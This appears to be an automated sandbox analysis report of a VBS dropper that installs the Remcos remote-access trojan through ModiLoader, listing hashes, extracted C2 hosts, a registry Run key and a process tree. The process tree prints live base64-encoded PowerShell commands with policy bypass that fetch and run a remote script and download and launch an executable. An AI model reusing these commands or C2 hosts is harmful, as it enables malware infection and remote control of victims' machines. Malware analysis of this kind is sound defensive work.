Analysis
-
max time kernel
148s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
06-10-2023 04:33
Static task
static1
Behavioral task
behavioral1
Sample
2230105.vbs
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
2230105.vbs
Resource
win10v2004-20230915-en
General
-
Target
2230105.vbs
-
Size
884B
-
MD5
fbbe9c432bd57ec2999ed6c59f56e9fe
-
SHA1
50a7227e75f3dbc73f2bbcc81798612fd7222868
-
SHA256
73709402a093f4b559532f016cb0c7f8b7bc29b413dc3321a79f5a5a38b81c44
-
SHA512
83805182c4588d089d4748143f093d1e48e5a1545c3deb15b1ffb4982d849868cbaf4ebe57d045513fad08b3cb74facd4b64d7680ac223db68711474d1fc3b03
Malware Config
Extracted
remcos
EU
tornado.ydns.eu:1972
orifak.ydns.eu:1972
rdpown.ydns.eu:1972
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
RmgDEfdfdef-3FSSYH
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ModiLoader Second Stage 1 IoCs
Processes:
resource yara_rule behavioral2/memory/5048-59-0x0000000002AE0000-0x0000000003AE0000-memory.dmp modiloader_stage2 -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 10 2016 powershell.exe 18 2336 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
Processes:
FIREF0X.exepid process 5048 FIREF0X.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
FIREF0X.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wblxhuak = "C:\\Users\\Public\\Wblxhuak.url" FIREF0X.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 64 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 66 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
PowerShELl.exEpowershell.exepowershell.exeFIREF0X.exepid process 1600 PowerShELl.exE 1600 PowerShELl.exE 2016 powershell.exe 2016 powershell.exe 2336 powershell.exe 2336 powershell.exe 5048 FIREF0X.exe 5048 FIREF0X.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
PowerShELl.exEpowershell.exepowershell.exesvchost.exedescription pid process Token: SeDebugPrivilege 1600 PowerShELl.exE Token: SeDebugPrivilege 2016 powershell.exe Token: SeDebugPrivilege 2336 powershell.exe Token: SeManageVolumePrivilege 3496 svchost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
SndVol.exepid process 2624 SndVol.exe -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
SndVol.exepid process 2624 SndVol.exe 2624 SndVol.exe -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
WScript.exePowerShELl.exEpowershell.exepowershell.exeFIREF0X.exedescription pid process target process PID 2900 wrote to memory of 1600 2900 WScript.exe PowerShELl.exE PID 2900 wrote to memory of 1600 2900 WScript.exe PowerShELl.exE PID 1600 wrote to memory of 2016 1600 PowerShELl.exE powershell.exe PID 1600 wrote to memory of 2016 1600 PowerShELl.exE powershell.exe PID 2016 wrote to memory of 2336 2016 powershell.exe powershell.exe PID 2016 wrote to memory of 2336 2016 powershell.exe powershell.exe PID 2336 wrote to memory of 5048 2336 powershell.exe FIREF0X.exe PID 2336 wrote to memory of 5048 2336 powershell.exe FIREF0X.exe PID 2336 wrote to memory of 5048 2336 powershell.exe FIREF0X.exe PID 5048 wrote to memory of 2624 5048 FIREF0X.exe SndVol.exe PID 5048 wrote to memory of 2624 5048 FIREF0X.exe SndVol.exe PID 5048 wrote to memory of 2624 5048 FIREF0X.exe SndVol.exe PID 5048 wrote to memory of 2624 5048 FIREF0X.exe SndVol.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2230105.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\sYsTEM32\wINdOWSpowERSHElL\v1.0\PowerShELl.exE"C:\Windows\sYsTEM32\wINdOWSpowERSHElL\v1.0\PowerShELl.exE" "POWERshELL -eX BYpASS -noP -EC aQBFAHgAKAAgAGkAbgB2AG8AawBlAC0AcgBlAHMAVABNAGUAdABoAE8ARAAgACcAaAB0AHQAcAA6AC8ALwB0AG8AcgBuAGEALgB5AGQAbgBzAC4AZQB1AC8AbwBuAC8AcgBlAHcAbwBwAC8AcABvAHcAZQByAHcAaQBuAG4AZQByAC4AcABzADEAJwApAA== "2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX BYpASS -noP -EC aQBFAHgAKAAgAGkAbgB2AG8AawBlAC0AcgBlAHMAVABNAGUAdABoAE8ARAAgACcAaAB0AHQAcAA6AC8ALwB0AG8AcgBuAGEALgB5AGQAbgBzAC4AZQB1AC8AbwBuAC8AcgBlAHcAbwBwAC8AcABvAHcAZQByAHcAaQBuAG4AZQByAC4AcABzADEAJwApAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX BypaSs -NoP -W HIdDen -EC IAAJAEkAbgBWAG8AawBFAC0AcgBlAFMAdABNAEUAdABIAG8ARAAgAAkALQBVAHIASQAgAAkAKAAdIGgAdAB0AHAAOgAvAC8AdABvAHIAbgBhAC4AeQBkAG4AcwAuAGUAdQAvAB0gIAAgACAAIAArACAAIAAdIG8AHSAgACAAIAAgACsAIAAgAB0gbgAvAGIAcwB2AC8AVwBiAGwAeABoAHUAYQBrAHMAHSAgACAAIAAgACsAIAAgAB0gdQBqAHYAHSAgACAAIAAgACsAIAAgAB0gaABxAC4AZQAdICAAIAAgACAAKwAgACAAHSB4AB0gIAAgACAAIAArACAAIAAdIGUAHSAgACAAKQAgACAALQBvAHUAVABGAGkAbABFACAAIAAdICQAZQBOAHYAOgB0AGUAbQBQAFwARgBJAFIARQBGADAAWAAuAGUAeABlAB0gIAA7ACAACQAmACAACQAdICQAZQBOAFYAOgB0AEUAbQBQAFwARgBJAFIARQBGADAAWAAuAGUAeABlAB0g4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\FIREF0X.exe"C:\Users\Admin\AppData\Local\Temp\FIREF0X.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\SndVol.exeC:\Windows\System32\SndVol.exe6⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD54222a755c020799d14ad6a3a5895e8ff
SHA1616b534f87f8a9cedf5089beb3778fa634af8e5b
SHA2561743a21bfa8fa07150825981fb41fb485b6737959b8aeb6acf80aa11783ebd78
SHA512b02b21c85068029d8b4f3e9d5b4fc851400a24a8b424e94b2af7c7dafb5d8bf83462423b4e287f0b8bcfeea5ff8ce9b8310a98bdb4771b581d848c88ed8bc798
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
C:\Users\Admin\AppData\Local\Temp\FIREF0X.exeFilesize
1.5MB
MD5c7fcb915a272045036e5d8e0de23fd5a
SHA119df745007c4edbb727851db3c65290620389a20
SHA2560fcbcb5c98c97d26b4df12fc4b1f18c926df5e943b6cad241836985f5da0290e
SHA51221e1adf068bd8211f3586af95726e691b1527ba17183ff7f8214b535cca7d65d94a63f985a62c6d2a010cd481e9dff09c4c1909a443c6ef54d7d7f83739ccca3
-
C:\Users\Admin\AppData\Local\Temp\FIREF0X.exeFilesize
1.5MB
MD5c7fcb915a272045036e5d8e0de23fd5a
SHA119df745007c4edbb727851db3c65290620389a20
SHA2560fcbcb5c98c97d26b4df12fc4b1f18c926df5e943b6cad241836985f5da0290e
SHA51221e1adf068bd8211f3586af95726e691b1527ba17183ff7f8214b535cca7d65d94a63f985a62c6d2a010cd481e9dff09c4c1909a443c6ef54d7d7f83739ccca3
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ncbp3kcy.xoj.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Public\Libraries\Wblxhuak.PIFFilesize
1.5MB
MD5c7fcb915a272045036e5d8e0de23fd5a
SHA119df745007c4edbb727851db3c65290620389a20
SHA2560fcbcb5c98c97d26b4df12fc4b1f18c926df5e943b6cad241836985f5da0290e
SHA51221e1adf068bd8211f3586af95726e691b1527ba17183ff7f8214b535cca7d65d94a63f985a62c6d2a010cd481e9dff09c4c1909a443c6ef54d7d7f83739ccca3
-
memory/1600-0-0x0000023FFBB30000-0x0000023FFBB52000-memory.dmpFilesize
136KB
-
memory/1600-56-0x00007FFCD6980000-0x00007FFCD7441000-memory.dmpFilesize
10.8MB
-
memory/1600-11-0x0000023FFBBC0000-0x0000023FFBBD0000-memory.dmpFilesize
64KB
-
memory/1600-53-0x00007FFCD6980000-0x00007FFCD7441000-memory.dmpFilesize
10.8MB
-
memory/1600-13-0x0000023FFBBC0000-0x0000023FFBBD0000-memory.dmpFilesize
64KB
-
memory/1600-12-0x0000023FFBBC0000-0x0000023FFBBD0000-memory.dmpFilesize
64KB
-
memory/1600-10-0x00007FFCD6980000-0x00007FFCD7441000-memory.dmpFilesize
10.8MB
-
memory/2016-14-0x00007FFCD6980000-0x00007FFCD7441000-memory.dmpFilesize
10.8MB
-
memory/2016-52-0x00007FFCD6980000-0x00007FFCD7441000-memory.dmpFilesize
10.8MB
-
memory/2016-26-0x0000021D2D410000-0x0000021D2D5D2000-memory.dmpFilesize
1.8MB
-
memory/2016-25-0x0000021D2AC40000-0x0000021D2AC50000-memory.dmpFilesize
64KB
-
memory/2016-24-0x0000021D2AC40000-0x0000021D2AC50000-memory.dmpFilesize
64KB
-
memory/2336-47-0x00007FFCD6980000-0x00007FFCD7441000-memory.dmpFilesize
10.8MB
-
memory/2336-39-0x0000023C90A30000-0x0000023C90A40000-memory.dmpFilesize
64KB
-
memory/2336-34-0x0000023C90A30000-0x0000023C90A40000-memory.dmpFilesize
64KB
-
memory/2336-28-0x0000023C90A30000-0x0000023C90A40000-memory.dmpFilesize
64KB
-
memory/2336-27-0x00007FFCD6980000-0x00007FFCD7441000-memory.dmpFilesize
10.8MB
-
memory/2624-75-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2624-76-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2624-123-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2624-122-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2624-121-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2624-65-0x0000000002A40000-0x0000000003A40000-memory.dmpFilesize
16.0MB
-
memory/2624-67-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2624-69-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2624-70-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2624-71-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2624-72-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2624-74-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2624-120-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2624-82-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2624-80-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/2624-81-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/3496-83-0x000001DB34940000-0x000001DB34950000-memory.dmpFilesize
64KB
-
memory/3496-99-0x000001DB34A40000-0x000001DB34A50000-memory.dmpFilesize
64KB
-
memory/3496-115-0x000001DB3CD60000-0x000001DB3CD61000-memory.dmpFilesize
4KB
-
memory/3496-117-0x000001DB3CD90000-0x000001DB3CD91000-memory.dmpFilesize
4KB
-
memory/3496-118-0x000001DB3CD90000-0x000001DB3CD91000-memory.dmpFilesize
4KB
-
memory/3496-119-0x000001DB3CEA0000-0x000001DB3CEA1000-memory.dmpFilesize
4KB
-
memory/5048-59-0x0000000002AE0000-0x0000000003AE0000-memory.dmpFilesize
16.0MB
-
memory/5048-57-0x0000000000720000-0x0000000000721000-memory.dmpFilesize
4KB
-
memory/5048-58-0x0000000002AE0000-0x0000000003AE0000-memory.dmpFilesize
16.0MB
-
memory/5048-62-0x0000000000720000-0x0000000000721000-memory.dmpFilesize
4KB
-
memory/5048-61-0x0000000000400000-0x0000000000593000-memory.dmpFilesize
1.6MB